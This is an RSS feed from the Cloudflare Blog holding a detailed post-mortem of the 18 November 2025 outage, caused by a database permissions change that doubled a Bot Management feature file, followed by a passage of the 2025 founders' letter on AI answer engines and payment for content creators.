
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Fri, 10 Apr 2026 17:26:02 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare outage on November 18, 2025]]></title>
            <link>https://blog.cloudflare.com/18-november-2025-outage/</link>
            <pubDate>Tue, 18 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in the generation logic for a Bot Management feature file, which caused many Cloudflare services to fail. 
 ]]></description>
            <content:encoded><![CDATA[ <p>On 18 November 2025 at 11:20 UTC (all times in this blog are UTC), Cloudflare's network began experiencing significant failures delivering core network traffic. To Internet users trying to access our customers' sites, this showed up as an error page indicating a failure within Cloudflare's network.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ony9XsTIteX8DNEFJDddJ/7da2edd5abca755e9088002a0f5d1758/BLOG-3079_2.png" />
          </figure><p><b>The issue was not caused, directly or indirectly, by a cyber attack or malicious activity of any kind.</b> Instead, it was triggered by a change to one of our database systems' permissions, which caused the database to output multiple entries into a “feature file” used by our Bot Management system. That feature file, in turn, doubled in size. The larger-than-expected feature file was then propagated to all the machines that make up our network.</p><p>The software running on these machines to route traffic across our network reads this feature file to keep our Bot Management system up to date with ever-changing threats. The software had a limit on the size of the feature file that was below its doubled size. That caused the software to fail.</p><p>We initially, and wrongly, suspected the symptoms we were seeing were caused by a hyper-scale DDoS attack. Once we correctly identified the core issue, we were able to stop the propagation of the larger-than-expected feature file and replace it with an earlier version of the file. Core traffic was largely flowing as normal by 14:30. We worked over the next few hours to mitigate increased load on various parts of our network as traffic rushed back online. As of 17:06 all systems at Cloudflare were functioning as normal.</p><p>We are sorry for the impact to our customers and to the Internet in general. Given Cloudflare's importance in the Internet ecosystem, any outage of any of our systems is unacceptable. That there was a period of time when our network was not able to route traffic is deeply painful to every member of our team. We know we let you down today.</p><p>This post is an in-depth account of exactly what happened and what systems and processes failed. It is also the beginning, though not the end, of what we plan to do in order to make sure an outage like this will not happen again.</p>
    <div>
      <h2>The outage</h2>
      <a href="#the-outage">
        
      </a>
    </div>
    <p>The chart below shows the volume of 5xx error HTTP status codes served by the Cloudflare network. Normally this should be very low, and it was right up until the start of the outage. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GdZcWhEqNjwOmLcsKOXT0/fca7e6970d422d04c81b2baafb988cbe/BLOG-3079_3.png" />
          </figure><p>The volume prior to 11:20 is the expected baseline of 5xx errors observed across our network. The spike, and subsequent fluctuations, show our system failing due to loading the incorrect feature file. What’s notable is that our system would then recover for a period. This was very unusual behavior for an internal error.</p><p>The explanation was that the file was being generated every five minutes by a query running on a ClickHouse database cluster, which was being gradually updated to improve permissions management. Bad data was only generated if the query ran on a part of the cluster which had been updated. As a result, every five minutes there was a chance of either a good or a bad set of configuration files being generated and rapidly propagated across the network.</p><p>This fluctuation made it unclear what was happening as the entire system would recover and then fail again as sometimes good, sometimes bad configuration files were distributed to our network. Initially, this led us to believe this might be caused by an attack. Eventually, every ClickHouse node was generating the bad configuration file and the fluctuation stabilized in the failing state.</p><p>Errors continued until the underlying issue was identified and resolved starting at 14:30. We solved the problem by stopping the generation and propagation of the bad feature file and manually inserting a known good file into the feature file distribution queue. And then forcing a restart of our core proxy.</p><p>The remaining long tail in the chart above is our team restarting remaining services that had entered a bad state, with 5xx error code volume returning to normal at 17:06.</p><p>The following services were impacted:</p><table><tr><th><p><b>Service / Product</b></p></th><th><p><b>Impact description</b></p></th></tr><tr><td><p>Core CDN and security services</p></td><td><p>HTTP 5xx status codes. 
The screenshot at the top of this post shows a typical error page delivered to end users.</p></td></tr><tr><td><p>Turnstile</p></td><td><p>Turnstile failed to load.</p></td></tr><tr><td><p>Workers KV</p></td><td><p>Workers KV returned a significantly elevated level of HTTP 5xx errors as requests to KV’s “front end” gateway failed due to the core proxy failing.</p></td></tr><tr><td><p>Dashboard</p></td><td><p>While the dashboard was mostly operational, most users were unable to log in due to Turnstile being unavailable on the login page.</p></td></tr><tr><td><p>Email Security</p></td><td><p>While email processing and delivery were unaffected, we observed a temporary loss of access to an IP reputation source which reduced spam-detection accuracy and prevented some new-domain-age detections from triggering, with no critical customer impact observed. We also saw failures in some Auto Move actions; all affected messages have been reviewed and remediated.</p></td></tr><tr><td><p>Access</p></td><td><p>Authentication failures were widespread for most users, beginning at the start of the incident and continuing until the rollback was initiated at 13:05. Any existing Access sessions were unaffected.</p><p>
</p><p>All failed authentication attempts resulted in an error page, meaning none of these users ever reached the target application while authentication was failing. Successful logins during this period were correctly logged. </p><p>
</p><p>Any Access configuration updates attempted at that time would have either failed outright or propagated very slowly. All configuration updates are now recovered.</p></td></tr></table><p>As well as returning HTTP 5xx errors, we observed significant increases in latency of responses from our CDN during the impact period. This was due to large amounts of CPU being consumed by our debugging and observability systems, which automatically enhance uncaught errors with additional debugging information.</p>
    <div>
      <h2>How Cloudflare processes requests, and how this went wrong today</h2>
      <a href="#how-cloudflare-processes-requests-and-how-this-went-wrong-today">
        
      </a>
    </div>
    <p>Every request to Cloudflare takes a well-defined path through our network. It could be from a browser loading a webpage, a mobile app calling an API, or automated traffic from another service. These requests first terminate at our HTTP and TLS layer, then flow into our core proxy system (which we call FL for “Frontline”), and finally through Pingora, which performs cache lookups or fetches data from the origin if needed.</p><p>We previously shared more detail about how the core proxy works <a href="https://blog.cloudflare.com/20-percent-internet-upgrade/"><u>here</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6qlWXM3gh4SaYYvsGc7mFV/99294b22963bb414435044323aed7706/BLOG-3079_4.png" />
          </figure><p>As a request transits the core proxy, we run the various security and performance products available in our network. The proxy applies each customer’s unique configuration and settings, from enforcing WAF rules and DDoS protection to routing traffic to the Developer Platform and R2. It accomplishes this through a set of domain-specific modules that apply the configuration and policy rules to traffic transiting our proxy.</p><p>One of those modules, Bot Management, was the source of today’s outage. </p><p>Cloudflare’s <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u></a> includes, among other systems, a machine learning model that we use to generate bot scores for every request traversing our network. Our customers use bot scores to control which bots are allowed to access their sites — or not.</p><p>The model takes as input a “feature” configuration file. A feature, in this context, is an individual trait used by the machine learning model to make a prediction about whether the request was automated or not. The feature configuration file is a collection of individual features.</p><p>This feature file is refreshed every few minutes and published to our entire network, allowing us to react to variations in traffic flows across the Internet, including new types of bots and new bot attacks. So it’s critical that it is rolled out frequently and rapidly, as bad actors change their tactics quickly.</p><p>A change in the behaviour of the underlying ClickHouse query that generates this file (explained below) caused it to have a large number of duplicate “feature” rows. This changed the size of the previously fixed-size feature configuration file, causing the bots module to trigger an error.</p><p>As a result, HTTP 5xx error codes were returned by the core proxy system that handles traffic processing for our customers, for any traffic that depended on the bots module. 
This also affected Workers KV and Access, which rely on the core proxy.</p><p>Unrelated to this incident, we are currently migrating our customer traffic to a new version of our proxy service, internally known as <a href="https://blog.cloudflare.com/20-percent-internet-upgrade/"><u>FL2</u></a>. Both versions were affected by the issue, although the impact observed was different.</p><p>Customers deployed on the new FL2 proxy engine observed HTTP 5xx errors. Customers on our old proxy engine, known as FL, did not see errors, but bot scores were not generated correctly, resulting in all traffic receiving a bot score of zero. Customers that had rules deployed to block bots would have seen large numbers of false positives. Customers who were not using our bot score in their rules did not see any impact.</p><p>Another apparent symptom threw us off and made us believe this might have been an attack: Cloudflare’s status page went down. The status page is hosted completely off Cloudflare’s infrastructure, with no dependencies on Cloudflare. While it turned out to be a coincidence, it led some of the team diagnosing the issue to believe that an attacker may be targeting both our systems and our status page. Visitors to the status page at that time were greeted by an error message:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7LwbB5fv7vdoNRWWDGN7ia/dad8cef76eee1305e0216d74a813612b/BLOG-3079_5.png" />
          </figure><p>In the internal incident chat room, we were concerned that this might be the continuation of the recent spate of high volume <a href="https://techcommunity.microsoft.com/blog/azureinfrastructureblog/defending-the-cloud-azure-neutralized-a-record-breaking-15-tbps-ddos-attack/4470422"><u>Aisuru</u></a> <a href="https://blog.cloudflare.com/defending-the-internet-how-cloudflare-blocked-a-monumental-7-3-tbps-ddos/"><u>DDoS attacks</u></a>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Ph13HSsOGC0KYRfoeZmSy/46522e46ed0132d2ea551aef4c71a5d6/BLOG-3079_6.png" />
          </figure>
    <div>
      <h3>The query behaviour change</h3>
      <a href="#the-query-behaviour-change">
        
      </a>
    </div>
    <p>I mentioned above that a change in the underlying query behaviour resulted in the feature file containing a large number of duplicate rows. The database system in question is built on ClickHouse.</p><p>For context, it’s helpful to know how ClickHouse distributed queries work. A ClickHouse cluster consists of many shards. To query data from all shards, we have so-called distributed tables (powered by the table engine <code>Distributed</code>) in a database called <code>default</code>. The Distributed engine queries underlying tables in a database <code>r0</code>. The underlying tables are where data is stored on each shard of a ClickHouse cluster.</p><p>Queries to the distributed tables run through a shared system account. As part of efforts to improve the security and reliability of our distributed queries, there’s work being done to make them run under the initial user accounts instead.</p><p>Before today, ClickHouse users would only see the tables in the <code>default</code> database when querying table metadata from ClickHouse system tables such as <code>system.tables</code> or <code>system.columns</code>.</p><p>Since users already have implicit access to underlying tables in <code>r0</code>, we made a change at 11:05 to make this access explicit, so that users can see the metadata of these tables as well. By making sure that all distributed subqueries can run under the initial user, query limits and access grants can be evaluated in a more fine-grained manner, preventing one user’s bad subquery from affecting others.</p><p>The change explained above resulted in all users accessing accurate metadata about tables they have access to. Unfortunately, an assumption had been made in the past that the list of columns returned by a query like the following would only include the <code>default</code> database:</p><p><code>SELECT
  name,
  type
FROM system.columns
WHERE
  table = 'http_requests_features'
ORDER BY name;</code></p><p>Note how the query does not filter for the database name. As we gradually rolled out the explicit grants to users of a given ClickHouse cluster, after the change at 11:05 the query above began returning “duplicates” of columns, because it also matched the underlying tables stored in the <code>r0</code> database.</p><p>This, unfortunately, was exactly the type of query performed by the Bot Management feature file generation logic to construct each input “feature” for the file mentioned at the beginning of this section. </p><p>The query above would return a table of columns like the one displayed (simplified example):</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZIC5X8vMM7ifbJc0vxgLD/49dd33e7267bdb03b265ee0acccf381d/Screenshot_2025-11-18_at_2.51.24%C3%A2__PM.png" />
          </figure><p>However, as part of the additional permissions that were granted to the user, the response now contained all the metadata of the <code>r0</code> schema, effectively more than doubling the number of rows in the response and, ultimately, the number of rows (i.e. features) in the final file output. </p>
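<p>The effect of the missing database filter can be sketched with a small, self-contained simulation. The schema below is a hypothetical stand-in for ClickHouse’s <code>system.columns</code> (the table layout and feature names are illustrative, not Cloudflare’s actual metadata): once the same logical table is visible in two databases, the unfiltered metadata query returns every column twice, while scoping the query to the intended database does not.</p>

```python
import sqlite3

# Toy stand-in for ClickHouse's system.columns metadata table
# (hypothetical schema, for illustration only).
conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE system_columns (
        database TEXT,
        tbl      TEXT,
        name     TEXT,
        type     TEXT
    )
""")

# The same logical table now exists twice: once as the Distributed
# table in `default`, once as the underlying shard-local table in `r0`.
features = [("feature_a", "Float32"), ("feature_b", "Float32")]
for db in ("default", "r0"):
    for name, ftype in features:
        conn.execute(
            "INSERT INTO system_columns VALUES (?, 'http_requests_features', ?, ?)",
            (db, name, ftype),
        )

# The query as written in the incident: no database predicate.
unfiltered = conn.execute(
    "SELECT name, type FROM system_columns "
    "WHERE tbl = 'http_requests_features' ORDER BY name"
).fetchall()

# The same query scoped to the intended database.
filtered = conn.execute(
    "SELECT name, type FROM system_columns "
    "WHERE tbl = 'http_requests_features' AND database = 'default' "
    "ORDER BY name"
).fetchall()

print(len(unfiltered))  # 4 -- every feature appears twice
print(len(filtered))    # 2 -- one row per feature
```

<p>Before the permissions change, the unfiltered query happened to return only one copy of each column because the <code>r0</code> metadata was not visible to the querying user; the explicit grants made the latent bug observable. Filtering on the database name removes that dependency on metadata visibility.</p>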
    <div>
      <h3>Memory preallocation</h3>
      <a href="#memory-preallocation">
        
      </a>
    </div>
    <p>Each module running on our proxy service has a number of limits in place to avoid unbounded memory consumption and to preallocate memory as a performance optimization. In this specific instance, the Bot Management system has a limit on the number of machine learning features that can be used at runtime. Currently that limit is set to 200, well above our current use of ~60 features. Again, the limit exists because for performance reasons we preallocate memory for the features.</p><p>When the bad file with more than 200 features was propagated to our servers, this limit was hit — resulting in the system panicking. The FL2 Rust code that makes the check and was the source of the unhandled error is shown below:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/640fjk9dawDk7f0wJ8Jm5S/668bcf1f574ae9e896671d9eee50da1b/BLOG-3079_7.png" />
          </figure><p>This resulted in the following panic which in turn resulted in a 5xx error:</p><p><code>thread fl2_worker_thread panicked: called Result::unwrap() on an Err value</code></p>
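<p>The failure mode can be illustrated with a short Python analogue of that check (the function, file format, and limit handling below are illustrative sketches, not the actual FL2 code): a parser that preallocates space for a fixed number of features treats an oversized file as an error, and whether that error is handled or simply unwrapped determines whether the system degrades gracefully or panics.</p>

```python
FEATURE_LIMIT = 200  # runtime limit from the post; memory is preallocated to this size

def load_features(lines, limit=FEATURE_LIMIT):
    """Parse a feature file, refusing files that exceed the preallocated limit."""
    features = []
    for line in lines:
        if len(features) >= limit:
            # Analogue of the Rust Err that was unwrap()ed in FL2.
            raise ValueError(f"feature file exceeds limit of {limit}")
        features.append(line.strip())
    return features

good_file = [f"feature_{i}" for i in range(60)]      # ~60 features: normal
bad_file = [f"feature_{i}" for i in range(60)] * 4   # duplicated rows: 240 features

assert len(load_features(good_file)) == 60

# unwrap()-style handling would let the error take the worker thread down.
# Safer handling: catch it and keep serving with the last known-good file.
current = load_features(good_file)
try:
    current = load_features(bad_file)
except ValueError:
    pass  # keep `current` pointing at the last good configuration
assert len(current) == 60
```

<p>The FL2 code took the <code>unwrap()</code> path, so the oversized file took down the worker thread; catching the error and retaining the last known-good configuration, as sketched in the <code>try</code>/<code>except</code> above, is one way to reject a bad file while continuing to serve traffic.</p>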
    <div>
      <h3>Other impact during the incident</h3>
      <a href="#other-impact-during-the-incident">
        
      </a>
    </div>
    <p>Other systems that rely on our core proxy were impacted during the incident. This included Workers KV and Cloudflare Access. The team was able to reduce the impact to these systems at 13:04, when a patch was made to Workers KV to bypass the core proxy. Subsequently, all downstream systems that rely on Workers KV (such as Access itself) observed a reduced error rate. </p><p>The Cloudflare Dashboard was also impacted due to both Workers KV being used internally and Cloudflare Turnstile being deployed as part of our login flow.</p><p>Turnstile was impacted by this outage, resulting in customers who did not have an active dashboard session being unable to log in. This showed up as reduced availability during two time periods: from 11:30 to 13:10, and between 14:40 and 15:30, as seen in the graph below.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/nB2ZlYyXiGTNngsVotyjN/479a0f9273c160c63925be87592be023/BLOG-3079_8.png" />
          </figure><p>The first period, from 11:30 to 13:10, was due to the impact to Workers KV, which some control plane and dashboard functions rely upon. This was restored at 13:10, when Workers KV bypassed the core proxy system.</p><p>The second period of impact to the dashboard occurred after restoring the feature configuration data. A backlog of login attempts began to overwhelm the dashboard. This backlog, in combination with retry attempts, resulted in elevated latency, reducing dashboard availability. Scaling control plane concurrency restored availability at approximately 15:30.</p>
    <div>
      <h2>Remediation and follow-up steps</h2>
      <a href="#remediation-and-follow-up-steps">
        
      </a>
    </div>
    <p>Now that our systems are back online and functioning normally, work has already begun on how we will harden them against failures like this in the future. In particular, we are:</p><ul><li><p>Hardening ingestion of Cloudflare-generated configuration files in the same way we would for user-generated input</p></li><li><p>Enabling more global kill switches for features</p></li><li><p>Eliminating the ability for core dumps or other error reports to overwhelm system resources</p></li><li><p>Reviewing failure modes for error conditions across all core proxy modules</p></li></ul><p>Today was Cloudflare's worst outage <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/"><u>since 2019</u></a>. We've had outages that have made our <a href="https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/"><u>dashboard unavailable</u></a>. Some that have caused <a href="https://blog.cloudflare.com/cloudflare-service-outage-june-12-2025/"><u>newer features</u></a> to be unavailable for a period of time. But in the last 6+ years we've not had another outage that has caused the majority of core traffic to stop flowing through our network.</p><p>An outage like today's is unacceptable. We've architected our systems to be highly resilient to failure to ensure traffic will always continue to flow. When we've had outages in the past, they have always led us to build new, more resilient systems.</p><p>On behalf of the entire team at Cloudflare, I would like to apologize for the pain we caused the Internet today. 
</p><table><tr><th><p>Time (UTC)</p></th><th><p>Status</p></th><th><p>Description</p></th></tr><tr><td><p>11:05</p></td><td><p>Normal.</p></td><td><p>Database access control change deployed.</p></td></tr><tr><td><p>11:28</p></td><td><p>Impact starts.</p></td><td><p>Deployment reaches customer environments, first errors observed on customer HTTP traffic.</p></td></tr><tr><td><p>11:32-13:05</p></td><td><p>The team investigated elevated traffic levels and errors to Workers KV service.</p><p>

</p></td><td><p>The initial symptom appeared to be degraded Workers KV response rate causing downstream impact on other Cloudflare services.</p><p>
</p><p>Mitigations such as traffic manipulation and account limiting were attempted to bring the Workers KV service back to normal operating levels.</p><p>
</p><p>The first automated test detected the issue at 11:31 and manual investigation started at 11:32. The incident call was created at 11:35.</p></td></tr><tr><td><p>13:05</p></td><td><p>Workers KV and Cloudflare Access bypass implemented — impact reduced.</p></td><td><p>During investigation, we used internal system bypasses for Workers KV and Cloudflare Access so they fell back to a prior version of our core proxy. Although the issue was also present in prior versions of our proxy, the impact was smaller as described below.</p></td></tr><tr><td><p>13:37</p></td><td><p>Work focused on rollback of the Bot Management configuration file to a last-known-good version.</p></td><td><p>We were confident that the Bot Management configuration file was the trigger for the incident. Teams worked on ways to repair the service in multiple workstreams, with the fastest workstream a restore of a previous version of the file.</p></td></tr><tr><td><p>14:24</p></td><td><p>Stopped creation and propagation of new Bot Management configuration files.</p></td><td><p>We identified that the Bot Management module was the source of the 500 errors and that this was caused by a bad configuration file. We stopped automatic deployment of new Bot Management configuration files.</p></td></tr><tr><td><p>14:24</p></td><td><p>Test of new file complete.</p></td><td><p>We observed successful recovery using the old version of the configuration file and then focused on accelerating the fix globally.</p></td></tr><tr><td><p>14:30</p></td><td><p>Main impact resolved. Downstream impacted services started observing reduced errors.</p></td><td><p>A correct Bot Management configuration file was deployed globally and most services started operating correctly.</p></td></tr><tr><td><p>17:06</p></td><td><p>All services resolved. Impact ends.</p></td><td><p>All downstream services restarted and all operations fully restored.</p></td></tr></table><p></p> ]]></content:encoded>
            <category><![CDATA[Outage]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Bot Management]]></category>
            <guid isPermaLink="false">oVEUcpjyyDA8DSSXiE7E6</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2025 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2025-annual-founders-letter/</link>
            <pubDate>Sun, 21 Sep 2025 18:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched 15 years ago. We like to celebrate our birthday by launching new products that give back to the Internet. But we've also been thinking a lot about what's changed on the Internet. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><u>launched 15 years ago</u></a> this week. We like to celebrate our birthday by announcing new products and features that give back to the Internet, which we’ll do a lot of this week. But, on this occasion, we've also been thinking about what's changed on the Internet over the last 15 years and what has not.</p><p>With some things there's been clear progress: when we launched in 2010, less than 10 percent of the Internet was encrypted; today, well over 95 percent is. We're proud of the <a href="https://blog.cloudflare.com/introducing-universal-ssl/"><u>role we played in making that happen</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MLknOh75r4KpCfiXTjQkw/b80baa01b75437f3b1da24be3ca9e209/Timeline_2_part.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xkR8gdKR1YO1tIr6rLOmv/7e848bbefa83db1078d7ffe35e2bcc51/2.png" />
          </figure><p>Some other areas have seen limited progress: IPv6 adoption has grown steadily but painfully slowly over the last 15 years, in <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>spite</u></a> <a href="https://blog.cloudflare.com/cloudflare-expanding-the-ipv6-web/"><u>of</u></a> <a href="https://blog.cloudflare.com/eliminating-the-last-reasons-to-not-enable-ipv6/"><u>our</u></a> <a href="https://blog.cloudflare.com/amazon-2bn-ipv4-tax-how-avoid-paying/"><u>efforts</u></a>. That's a problem: as IPv4 addresses have become scarce and expensive, the shortage has held back new entrants and driven up the costs of things like networking and cloud computing.</p>
    <div>
      <h2>The Internet’s Business Model</h2>
      <a href="#the-internets-business-model">
        
      </a>
    </div>
    <p>Still other things have remained remarkably consistent: the basic business model of the Internet has for the last 15 years been the same — create compelling content, find a way to be discovered, and then generate value from the resulting traffic. Whether that was through ads or subscriptions or selling things or just the ego of knowing that someone is consuming what you created, traffic generation has been the engine that powered the Internet we know today.</p><p>Make no mistake, the Internet has never been free. There's always been a reward system that transferred value from consumers to creators and, in doing so, filled the Internet with content. Had the Internet not had that reward system it wouldn't be nearly as vibrant as it is today.</p><p>A bit of a trivia aside: why did Cloudflare never build an ad blocker <a href="https://www.answeroverflow.com/m/1123890164222144542"><u>despite many requests</u></a>? Because, as imperfect as they are, ads have been the only micropayment system that has worked at scale to encourage an open Internet while also compensating content creators for their work. Our mission is to help build a better Internet, and a core value is that we’re principled, so we weren’t going to hamper the Internet’s fundamental business model.</p>
    <div>
      <h2>Traffic ≠ Value</h2>
      <a href="#traffic-value">
        
      </a>
    </div>
    <p>But that same traffic-based reward system has also created many of the problems we lament in the current state of the Internet. Traffic has always been an imperfect proxy for value. Over the last 15 years we've watched more and more of the Internet be driven by annoying clickbait or dangerous ragebait. Entire media organizations have built their businesses with a stated objective of writing headlines to generate the maximum cortisol response because that's what generates the maximum amount of traffic.</p><p>Over the years, Cloudflare has at times faced calls for us to intervene and control what content can be published online. As an infrastructure provider, we've never felt we were the right place for those editorial decisions to be made. But it wasn't because we didn't worry about the direction the traffic-incentivized Internet seemed to be headed. It always seemed like what fundamentally needed to change was not more content moderation at the infrastructure level but instead a healthier incentive system for content creation.</p><p>Today, the conditions to bring about that change may finally be emerging. In the last year, something core to the Internet we’ve all known has changed. It's being driven by AI and, with some care and nurturing, it has an opportunity to help bring about what we think may be a much better Internet.</p>
    <div>
      <h2>From Search to Answers</h2>
      <a href="#from-search-to-answers">
        
      </a>
    </div>
    <p>What’s the change? The primary discovery system of the Internet for the last 15 years has been Search Engines. They scraped the Internet's content, built an index, and then presented users with a treasure map which they followed generating traffic. Content creators were happy to let Search Engines scrape their content because there were a limited number of them, so the infrastructure costs were relatively low and, more importantly, because the Search Engines gave something to sites in the form of traffic — the Internet’s historic currency — sent back to sites.</p><p>It’s already clear that the Internet’s discovery system for the next 15 years will be something different: Answer Engines. Unlike Search Engines which gave you a map where you hunted for what you were looking for, driving traffic in the process, Answer Engines just give you the answer without you having to click on anything. For 95 percent of users 95 percent of the time, that is a better user experience.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d2TQwVHA8GpFUBpAdr8QT/23fd6b7306d55dce3dea9e989784595d/BLOG-2994_3.png" />
          </figure><p>You don’t have to look far to see this is changing rapidly before our eyes. ChatGPT, Anthropic’s Claude, and other AI startups aren’t Search Engines — they’re Answer Engines. Even Google, the search stalwart, is increasingly serving “AI Overviews” in place of 10 blue links. We can often look to sci-fi movies for a glimpse of our most likely future. In them, the helpful intelligent robot character didn’t answer questions with: “Here are some links you can click on to maybe find what you’re looking for.” Whether you like it or not, the future will increasingly be answers, not searches.</p>
    <div>
      <h2>Short Term Pain</h2>
      <a href="#short-term-pain">
        
      </a>
    </div>
    <p>In the short term, this is going to be extremely painful for some industries that are built based on monetizing traffic. It already is. While ecommerce and social applications haven't yet seen a significant drop in traffic as the world switches to Answer Engines, media companies have. Why the difference? Well, for the former, you still need to buy the thing the Answer Engine recommends and, for now, we still value talking with other humans.</p><p>But for media companies, if the Answer Engine gives you the summary of what you’re looking for in most cases you don’t need to read the story. And the loss of traffic for media companies has already been dramatic. It’s not just traditional media. Research groups at investment banks, industry analysts, major consulting firms — they’re all seeing major drops in people finding their content because we are increasingly getting answers not search treasure maps.</p><p>Some say these answer engines or agents are just acting on behalf of humans. Sure but so what? Without a change they will still kill content creators’ businesses. If you ask your agent to summarize twenty different news sources but never actually visit any of them you’re still undermining the business model of those news sources. Agents don’t click on ads. And if those agents are allowed to aggregate information on behalf of multiple users it’s an even bigger problem because then subscription revenue is eliminated as well. Why subscribe to the Wall Street Journal or New York Times or Financial Times or Washington Post if my agent can free ride off some other user who does?</p><p>Unless you believe that content creators should work for free, or that they are somehow not needed anymore — both of which are naive assumptions — something needs to change. A visit from an agent isn’t the same as a visit from a human and therefore should have different rules of the road. 
If nothing changes, the drop in human traffic to the media ecosystem writ large will kill the business model that has built the content-rich Internet we enjoy today.</p><p>We think that’s an existential threat to one of humanity’s most important creations: the Internet.</p>
    <div>
      <h2>Rewarding Better Content</h2>
      <a href="#rewarding-better-content">
        
      </a>
    </div>
    <p>But there’s reason for optimism. Content is the fuel that powers every AI system, and the companies that run those AI systems know that, ultimately, they need to financially support the ecosystem. Because of that, it seems we may be on the cusp of a new, better, and maybe healthier Internet business model. As content creators use tools like the <a href="https://blog.cloudflare.com/introducing-ai-crawl-control/"><u>ones provided by Cloudflare to restrict AI robots from taking their content without compensation</u></a>, we're already seeing a market emerge and better deals being struck between AI and content companies.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5J0hmMolAcrPKBZSJzKNMw/d78a04e0ae0afb2c578e7b7c1ca8b1c9/BLOG-2994_4.png" />
          </figure><p>What's most interesting is which content companies are getting the best deals. It's not the ragebait headline writers. It's not the news organizations writing yet another take on what's going on in politics. It's not the spammy content farms full of drivel. Instead, it's <a href="https://www.bloomberg.com/news/articles/2025-09-17/reddit-seeks-to-strike-next-ai-content-pact-with-google-openai"><u>Reddit</u></a> and other quirky corners that best remind us of the Internet of old. For those of you old enough, think back to the Internet not of the last 15 years but of the last 35. We’ve lost some of what made that early Internet great, but there are indications that we might finally have the incentives to bring more of it back.</p><p>It seems increasingly likely that in our future, AI-driven Internet — assuming the AI companies are willing to step up, support the ecosystem, and pay for the content that is the most valuable to them — it’s the creative, local, unique, original content that’ll be worth the most. And, if you’re like us, the thing you, as an Internet consumer, are craving more of is creative, local, unique, original content. And, it turns out, having talked with many of them, that’s the content that content creators are most excited to create.</p>
    <div>
      <h2>A New Internet Business Model</h2>
      <a href="#a-new-internet-business-model">
        
      </a>
    </div>
    <p>So how will the business model work? Well, for the first time in history, we have a pretty good mathematical representation of human knowledge. Sum up all the LLMs and that's what you get. It's not perfect, but it's pretty good. Inherently, the same mathematical model serves as a map for the gaps in human knowledge. Like a block of Swiss cheese — there's a lot of cheese, but there are also a lot of holes.</p><p>Imagine a future business model of the Internet that doesn't reward traffic-generating ragebait but instead rewards those content creators that help fill in the holes in our collective metaphorical cheese. That will involve some portion of the subscription fees AI companies collect, and some portion of the revenue from the ads they'll inevitably serve, going back to content creators who most enrich the collective knowledge.</p><p>As a rough and simplistic sketch, think of it as some number of dollars per monthly active user of each AI company going into a collective pool, to be distributed to content creators based on what most fills in the holes in the cheese.</p><p>You could imagine an AI company suggesting back to creators that it needs more content about topics it doesn't have enough coverage of. Say, for example, the carrying capacity of unladen swallows, because they know their subscribers of a certain age and proclivity are always looking for answers about that topic. The very pruning algorithms the AI companies use today form a roadmap for what content is worth enough to not be pruned but paid for.</p><p>While today the budget items that differentiate AI companies are how much they can afford to spend on GPUs and top talent, as those things inevitably become commoditized, it seems likely that what will differentiate the different AIs is their access to creative, local, unique, original content. And the math of their algorithms provides them a map of what’s worth the most. 
While there are a lot of details to work out, those are the ingredients you need for a healthy market.</p>
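    <p>As a purely illustrative toy model of the pooled arrangement sketched above — the per-MAU rate and the "gap score" metric are hypothetical, not a real product — the arithmetic looks like this:</p>

```python
# Purely illustrative sketch of the pooled-compensation idea described above.
# The per-MAU rate and the "gap score" metric are hypothetical assumptions.

def distribute_pool(dollars_per_mau: float, monthly_active_users: int,
                    gap_scores: dict[str, float]) -> dict[str, float]:
    """Split a pool (rate x MAU) among creators pro rata by how much
    their content fills holes in the collective "cheese"."""
    pool = dollars_per_mau * monthly_active_users
    total = sum(gap_scores.values())
    if total == 0:
        return {creator: 0.0 for creator in gap_scores}
    return {creator: pool * score / total
            for creator, score in gap_scores.items()}
```

    <p>A creator whose content fills three times as many gaps as another would, under this toy model, draw three times the payout from the same pool.</p>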
    <div>
      <h2>Cloudflare’s Role</h2>
      <a href="#cloudflares-role">
        
      </a>
    </div>
